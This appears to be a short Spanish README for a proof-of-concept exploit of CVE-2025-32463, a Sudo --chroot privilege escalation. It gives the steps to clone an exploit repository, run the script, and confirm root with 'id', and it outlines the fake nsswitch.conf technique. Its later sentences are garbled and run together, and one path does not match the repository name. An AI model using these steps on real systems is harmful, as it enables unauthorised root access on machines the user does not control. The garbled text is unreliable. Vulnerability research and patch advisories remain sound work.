
CVE-2025-32463
Aquí tienes un resumen de CVE-2025-32463 sin enlaces:
CVE-2025-32463 es una vulnerabilidad de escalada local de privilegios en Sudo versiones 1.9.14 a 1.9.17. Abusa de la opción --chroot (-R) manipulando la forma en que Sudo maneja nsswitch.conf. Esto permite a un atacante local engañar a Sudo para que cargue una biblioteca compartida maliciosa, obteniendo acceso root, incluso si no está en el archivo sudoers.
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
sudo -R /fake-dir some-command./fake-dir, coloca un etc/nsswitch.conf falso que obliga a Sudo a resolver usuarios o grupos mediante un método personalizado.sudo --version--chroot a menos que sea necesarioIncluso si un usuario no tiene derechos sudo, puede convertirse potencialmente en root abusando de este fallo. Es un problema crítico que afecta a muchos sistemas y debe parchearse inmediatamente.
Este PoC se proporciona únicamente con fines educativos y de investigación. Ejecutarlo en cualquier sistema sin permiso es ilegal y antiético !!!